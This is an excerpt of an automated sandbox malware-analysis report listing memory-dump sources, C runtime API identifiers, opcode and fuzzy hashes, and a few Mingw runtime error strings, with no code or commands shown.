                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 973f610a1e52581bf0f4b17b39413a03c3a38581ea3d35c5a36c57133aef3daf
                                  • Instruction ID: 6fb300ab29d0c252d45b372c57bef7d5060b5cc8d08c93201faa6300e43ee61d
                                  • Opcode Fuzzy Hash: 973f610a1e52581bf0f4b17b39413a03c3a38581ea3d35c5a36c57133aef3daf
                                  • Instruction Fuzzy Hash: FBB0122385DC4140C3002F30DC113B96735DB5A205B897430E06440162C52CD018C114
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 388111225-0
                                  • Opcode ID: cb682a384e9847fcd58d2a56c79d4b882a0455c15685cfbff69562d094508653
                                  • Instruction ID: 1a77e08be4737f48f944b57fe637471ac391c50ba57735b096dc829adafb36ea
                                  • Opcode Fuzzy Hash: cb682a384e9847fcd58d2a56c79d4b882a0455c15685cfbff69562d094508653
                                  • Instruction Fuzzy Hash: 0E31CA71A087084EF7157F78C88E3793798EB46328F150259E472C72E3DB7F989286A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                  • String ID:
                                  • API String ID: 2644381645-0
                                  • Opcode ID: 94c223365c994b111b2dc29acc6dc628d4905ebb8eba9f35d440403a8ac84c36
                                  • Instruction ID: 79a26e7dc2273c6012b524f73409a0b4106ea116b092746dfb6dbcb31b42274c
                                  • Opcode Fuzzy Hash: 94c223365c994b111b2dc29acc6dc628d4905ebb8eba9f35d440403a8ac84c36
                                  • Instruction Fuzzy Hash: C8210A32D086080EF3197B68D84E36977D8EB46329F15015DE436C72D3D77E5892C6A2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                                  • String ID:
                                  • API String ID: 1078912150-0
                                  • Opcode ID: a09234805fd2a9c6af106032af68e44df28ba4d40962d0ef7be1a13687e388c4
                                  • Instruction ID: a712bc3ee663eeefa9a93c870b8b07ec4470bbd3b382363a3d504de0e9d6f69c
                                  • Opcode Fuzzy Hash: a09234805fd2a9c6af106032af68e44df28ba4d40962d0ef7be1a13687e388c4
                                  • Instruction Fuzzy Hash: 3421FC32D086040EF3187B68D89E37937D8DB82328F150618F476872D7CBBE58828676
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                                  • String ID:
                                  • API String ID: 2464146582-0
                                  • Opcode ID: ba9d0298e89461305872d42ae689c17141045664cbdffe6ae79e365563c6fb79
                                  • Instruction ID: bbfc46a7be1256216f6ffa265fbf1078abc92a504e2080298dd3a4fed7131eb2
                                  • Opcode Fuzzy Hash: ba9d0298e89461305872d42ae689c17141045664cbdffe6ae79e365563c6fb79
                                  • Instruction Fuzzy Hash: 0B21EA31E0C6044EF3187F68D88E3697788DB86329F15020DE47B872E7D7BE5C9186A6
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                                  • String ID:
                                  • API String ID: 2140805544-0
                                  • Opcode ID: bf5d551c04f4d35802267776e569c6e429d3d3e61a2abcb4f0089388d7e57412
                                  • Instruction ID: 01efef7228a083f83a45cfdb17d2b22ab0c77e66d228532b7bb620595d1e42d7
                                  • Opcode Fuzzy Hash: bf5d551c04f4d35802267776e569c6e429d3d3e61a2abcb4f0089388d7e57412
                                  • Instruction Fuzzy Hash: B421C632D08A085EE3147F64889D3697B98EF42329F15052CA03B872E3C7BE98818B65
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: free$FreeHeap_errno
                                  • String ID:
                                  • API String ID: 2737118440-0
                                  • Opcode ID: b1f13390e6f73e290a8a85abc7660ad11c4dc8207aa777efcb903b5d7cfd6875
                                  • Instruction ID: eb084bd51208170e597c5e0d520f5cef773467893a621fcb71d54a2a0d67db20
                                  • Opcode Fuzzy Hash: b1f13390e6f73e290a8a85abc7660ad11c4dc8207aa777efcb903b5d7cfd6875
                                  • Instruction Fuzzy Hash: 98413030A559198FFFA4EB58D8DDBA533D6FB58319FA9812C941BC21D1CF3D88868720
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: QueryVirtual
                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                  • API String ID: 1804819252-1534286854
                                  • Opcode ID: 2765e635f3e55e85a27cf16e814756a73a582f08290021675094e35a90ee78f4
                                  • Instruction ID: 31f83f94f7232708310e90bec1aafa3735ddaadab9f83acf4a325bf7137d91e6
                                  • Opcode Fuzzy Hash: 2765e635f3e55e85a27cf16e814756a73a582f08290021675094e35a90ee78f4
                                  • Instruction Fuzzy Hash: AC51B4B6E0E64681EA10AB11E844AABE761FF95B94FC64135EE4C073B4FE3CE461C350
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: free$malloc$_errno$_callnewh
                                  • String ID:
                                  • API String ID: 4160633307-0
                                  • Opcode ID: a7d75cbd17d150eb653f4607e705647d253ccc58468d39dc5f1f1e7ed33e4189
                                  • Instruction ID: ad7cfea0d33efd002b279d978f8f6e0bdb2d7e1f07401a2715552de4ed0e9065
                                  • Opcode Fuzzy Hash: a7d75cbd17d150eb653f4607e705647d253ccc58468d39dc5f1f1e7ed33e4189
                                  • Instruction Fuzzy Hash: 2B91EA34B18B094BD769AA1C944D7B9B3D9EB88748F54031ED49BC3282DF3EDC424687
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 3191669884-0
                                  • Opcode ID: 385a1d44e6221908d415fcab12e09315a634a94b3a546da79e2e89b056cffdd9
                                  • Instruction ID: 8cc4a74c4ae01d767ff81aad82d236f8b1f036796ee7a8b96403890f85e09fab
                                  • Opcode Fuzzy Hash: 385a1d44e6221908d415fcab12e09315a634a94b3a546da79e2e89b056cffdd9
                                  • Instruction Fuzzy Hash: 8C31AE32A18B088FDB54AF58908C76A77D4FB58328F2503ADE429C72D2DB79DC80C781
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 2917016420-0
                                  • Opcode ID: e1cf21fb225296154490f39138421c0b816cea72f5091d5b4f407222838ca290
                                  • Instruction ID: 0e836b52ec6c81b2eaac9f022a9dac819697e82a48af90375ad4162c0d53accd
                                  • Opcode Fuzzy Hash: e1cf21fb225296154490f39138421c0b816cea72f5091d5b4f407222838ca290
                                  • Instruction Fuzzy Hash: 0331D630A14A094FFB58AF78881D3A973D5FB89319F24465DE45BC32D2DB7DC8818752
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                                  • String ID:
                                  • API String ID: 4120058822-0
                                  • Opcode ID: 1469c9bfab1e04d6f86bc4b468c36adadddded4816b8d2a384ffeeb2377a9677
                                  • Instruction ID: d00e39f7d04e3d3cc99d7a0802caae5c1d161a4b1cd26a6d2c30129ac5cb820b
                                  • Opcode Fuzzy Hash: 1469c9bfab1e04d6f86bc4b468c36adadddded4816b8d2a384ffeeb2377a9677
                                  • Instruction Fuzzy Hash: CF212222E08A045EF225BFA8989D3697788EB55328F05011CE43AC72D3C77F58C0C7A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                  • String ID:
                                  • API String ID: 2328795619-0
                                  • Opcode ID: 2f5209122fb759edfdff3039bf8fb0b2a88c46c8169eecef4dfdbe4bc70bf479
                                  • Instruction ID: 66b468ea171d22162a72cd88297f162dee45b89eb52bd5a3913a2e198b50426f
                                  • Opcode Fuzzy Hash: 2f5209122fb759edfdff3039bf8fb0b2a88c46c8169eecef4dfdbe4bc70bf479
                                  • Instruction Fuzzy Hash: 0B61F530A18F094AE768562C584E33973C9E796724F64032DE477C32D7EF7E989242D2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                  • String ID:
                                  • API String ID: 1547050394-0
                                  • Opcode ID: da30a4fbe809b8ca67a8f5160054303a7165575a42b330f88a57f9d26e578010
                                  • Instruction ID: 06668c47ea772d98ace46a59bdf4443e938c56236c21695c106e08aeb2b90303
                                  • Opcode Fuzzy Hash: da30a4fbe809b8ca67a8f5160054303a7165575a42b330f88a57f9d26e578010
                                  • Instruction Fuzzy Hash: EB21A130E18A4D4FF794AB38440D36A77DAEB99318F54056AA45AC3293DB7DCCC187A2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: free$_errno$_callnewhmalloc
                                  • String ID:
                                  • API String ID: 2761444284-0
                                  • Opcode ID: 8f27b9b8814d88eefaf0c30430a09405aaeaa2f49b6202366e2d2d11d21f24eb
                                  • Instruction ID: b1a80ae7571c4a417b5eb6f4cd9fbd43a46c0886dfac1d374735bd89b916e86b
                                  • Opcode Fuzzy Hash: 8f27b9b8814d88eefaf0c30430a09405aaeaa2f49b6202366e2d2d11d21f24eb
                                  • Instruction Fuzzy Hash: 1F51D830B18F195BEB599B28944D77AB7D4FB49308F50022DD86BC3646DF29E8828686
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
                                  • String ID:
                                  • API String ID: 2667508507-0
                                  • Opcode ID: 69ae3169a039df52091071606f3a1e8249e5672861753253b765f1f3427f6835
                                  • Instruction ID: 1d65e65a2bfb8e038d97e6cdae92d590081258fe00617910f7f5d7e7e1d48a12
                                  • Opcode Fuzzy Hash: 69ae3169a039df52091071606f3a1e8249e5672861753253b765f1f3427f6835
                                  • Instruction Fuzzy Hash: 3AB18130A146044BEB58BB64949E7FD73D9EB94308F404529A86BC32D3EF3ED9858792
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: fputcmemset
                                  • String ID:
                                  • API String ID: 947785774-0
                                  • Opcode ID: 555f8774b8e81171a088c9ae3eef83ff67c5074706860f87334bd2843081a2d8
                                  • Instruction ID: 36b25bbdd042c60629a608f62e2cd0d7cbe922a95d716c3ae3240850fe2cd8a9
                                  • Opcode Fuzzy Hash: 555f8774b8e81171a088c9ae3eef83ff67c5074706860f87334bd2843081a2d8
                                  • Instruction Fuzzy Hash: 8EB13AF2E6E14186F725AA35C009B3BA690EF40764F96A231CE1D077E5EA3CF851C760
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                                  • String ID:
                                  • API String ID: 2887643383-0
                                  • Opcode ID: ccde22759ef2e3f78cce72c2939bc019c04d076555ce75b1dc7219c434147f26
                                  • Instruction ID: e60b7c4e582efe70e7c11b3cc16fad938619d9d8dc34275e9962a6e45c6f1b0e
                                  • Opcode Fuzzy Hash: ccde22759ef2e3f78cce72c2939bc019c04d076555ce75b1dc7219c434147f26
                                  • Instruction Fuzzy Hash: 68518731A1CA084FE748EB2C945D7B9B3D5EB89304F50426DE45BC32D7DF3D99468681
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _lock$_calloc_crt_mtinitlocknum
                                  • String ID:
                                  • API String ID: 3962633935-0
                                  • Opcode ID: 8dddd40cba0b96657f5797606e885a34095d890d14caea9c99b50cb58fb4cd36
                                  • Instruction ID: acdf7ada1cde3b0ab8ae1b97c2d10024ff63ff7c42cff50a60044c526fdd894e
                                  • Opcode Fuzzy Hash: 8dddd40cba0b96657f5797606e885a34095d890d14caea9c99b50cb58fb4cd36
                                  • Instruction Fuzzy Hash: 62513871828B098FE714AF18C88D365B3D4FB55318F11025DE85AC72A2D77ED882CBC2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: free$_errno$_callnewhmalloc
                                  • String ID:
                                  • API String ID: 2761444284-0
                                  • Opcode ID: a45fc30acfc366bf9b051932b8caba1d9495d79fe219d51417d01d77f5c5bb34
                                  • Instruction ID: 922cc1a855ccdfe16970a3cfb399eee5921d6b205e1e1d2e09a3eb5689950f06
                                  • Opcode Fuzzy Hash: a45fc30acfc366bf9b051932b8caba1d9495d79fe219d51417d01d77f5c5bb34
                                  • Instruction Fuzzy Hash: 8C413830718B0D1BEB289A2C494D77A33D8EB95359F14022DD49BC3283EE2FD9474392
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                                  • String ID:
                                  • API String ID: 304646821-0
                                  • Opcode ID: aa8b06c3288e952ecbdf324b898e62218ab50926b5a5fcb56ef63d4126ab63d5
                                  • Instruction ID: d9de9c7a6053cf11620b10abf92c9057878d5466385b6ea5027c88602f3ee021
                                  • Opcode Fuzzy Hash: aa8b06c3288e952ecbdf324b898e62218ab50926b5a5fcb56ef63d4126ab63d5
                                  • Instruction Fuzzy Hash: C551A130914A184FEB58AF28C4DD76577E4EB58318F140699D427CB2D6D73EE8C1CB91
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errno$_snprintffreemalloc$FreeHeap_callnewh_invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 343393124-0
                                  • Opcode ID: ec25d155d64a04f5a4d69300301c4abe570cf977cc4f299410c5493cce9685bc
                                  • Instruction ID: fffce9dac35dd527d9eb02778cfe0b4b9552c5c02d96214a258241029fdf18b7
                                  • Opcode Fuzzy Hash: ec25d155d64a04f5a4d69300301c4abe570cf977cc4f299410c5493cce9685bc
                                  • Instruction Fuzzy Hash: 0A41933471C9480FEA5CAB2C682E7B477D6E789314F448259D09FC3297DA3EAC828795
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errno$free$FreeHeap_callnewhfclosefwritemalloc
                                  • String ID:
                                  • API String ID: 415550720-0
                                  • Opcode ID: 1ec553c66c746d099e6808a9a78dd35a746a31c899afe7e7e07bb86eb44d6d70
                                  • Instruction ID: 0de9ef82631d1e0cf7a694c4283b51d1f27e86ee57ef4d8262cdb809f395451e
                                  • Opcode Fuzzy Hash: 1ec553c66c746d099e6808a9a78dd35a746a31c899afe7e7e07bb86eb44d6d70
                                  • Instruction Fuzzy Hash: 37218620A28A084BEB44E72C445D7AEB3D5FB8C358F54066DB45BC32C2DF3E99814792
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _getptd_noexit$__doserrno_errno
                                  • String ID:
                                  • API String ID: 2964073243-0
                                  • Opcode ID: 1a9f3c273fde667eee1e28420fd08ba4f6fdad69626380ca01bd7ea3b71185bb
                                  • Instruction ID: 1f82f8b5a21feb0d430ebc5ee8ebcc0e2c4f3536b967dda637751711cc2e895c
                                  • Opcode Fuzzy Hash: 1a9f3c273fde667eee1e28420fd08ba4f6fdad69626380ca01bd7ea3b71185bb
                                  • Instruction Fuzzy Hash: 3F01D12192080D5FE619BB75C89E3A8739CEB1232DF548248A426C62EBC77F18C1C622
                                  APIs
                                  • VirtualProtect.KERNEL32(00007FF7AD098110,00007FF7AD098118,00000001,?,?,?,?,00007FF8C6F6ADA0,00007FF7AD041228,?,?,?,00007FF7AD0413E6), ref: 00007FF7AD0420FD
                                  Strings
                                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7AD042167
                                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7AD04224E
                                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF7AD042242
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                  • API String ID: 544645111-1286557213
                                  • Opcode ID: a0f94685ef5bd4ef61378bbb0e5bcf492c6639d8b0de48b95d17e77c9d1cee60
                                  • Instruction ID: 267817c7910178d1f61438fc133c9cc13678469aa4fa273834c025e7a394ce89
                                  • Opcode Fuzzy Hash: a0f94685ef5bd4ef61378bbb0e5bcf492c6639d8b0de48b95d17e77c9d1cee60
                                  • Instruction Fuzzy Hash: 2991A6A6F4F51289EA106B219508B7BE291FF65760FC64231DE1D137F5FE3CE8628221
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                  • String ID:
                                  • API String ID: 2026495703-0
                                  • Opcode ID: e42e8bb37c17fb866d7ab9e581f67a34594f586a0dca43f1649d0ab14eded3ec
                                  • Instruction ID: 18c6ecf57deeee901e7dd96f4c578d2f8d4ffa8e6a510d8a960b891ac4e7f746
                                  • Opcode Fuzzy Hash: e42e8bb37c17fb866d7ab9e581f67a34594f586a0dca43f1649d0ab14eded3ec
                                  • Instruction Fuzzy Hash: 8F118130A1CF144FEBA8EF6CA08975677D1FB8C314F14465EE05AC3296DA389C8247D1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71253800d1795a9d3461c9a2abaf0dff8d7b3023a836dbffc4b560ae3a195706
                                  • Instruction ID: 04caa575f505ee9c317314b701c5336d110947318323971cec20fc38604bd84c
                                  • Opcode Fuzzy Hash: 71253800d1795a9d3461c9a2abaf0dff8d7b3023a836dbffc4b560ae3a195706
                                  • Instruction Fuzzy Hash: 1A91AAF2A6E25346E7659F25C108B3BAA91EB04B94F96D134CE0C573D5EB3CE8118760
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 634798775-0
                                  • Opcode ID: 0aeef574da07145cfdd41d53376bf3e81e49c591176030f61e29d107625eec6d
                                  • Instruction ID: cb100d0fa528fd012fe50063a59d18c5de2f56f31017ce3120ea937bb736e58e
                                  • Opcode Fuzzy Hash: 0aeef574da07145cfdd41d53376bf3e81e49c591176030f61e29d107625eec6d
                                  • Instruction Fuzzy Hash: EA51F830A18F090BE6685A6D948D33573D6E754319F34022DD46BC31D7EB7EDC928692
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: clock
                                  • String ID:
                                  • API String ID: 3195780754-0
                                  • Opcode ID: 7862a7d32f1c9ad9b973ef17a076326fdf486dc74a254423f992730849a2d722
                                  • Instruction ID: 98a9d0eb30b9e9506ae4e36c9b7405aafeecb00e40e5acd809ab3023bddda83c
                                  • Opcode Fuzzy Hash: 7862a7d32f1c9ad9b973ef17a076326fdf486dc74a254423f992730849a2d722
                                  • Instruction Fuzzy Hash: 0721F63280C70C4EE76CBDA8564E226B7C8D785354F150B2DE9EA83152E75B9C8286D6
                                  APIs
                                  Memory Dump Source
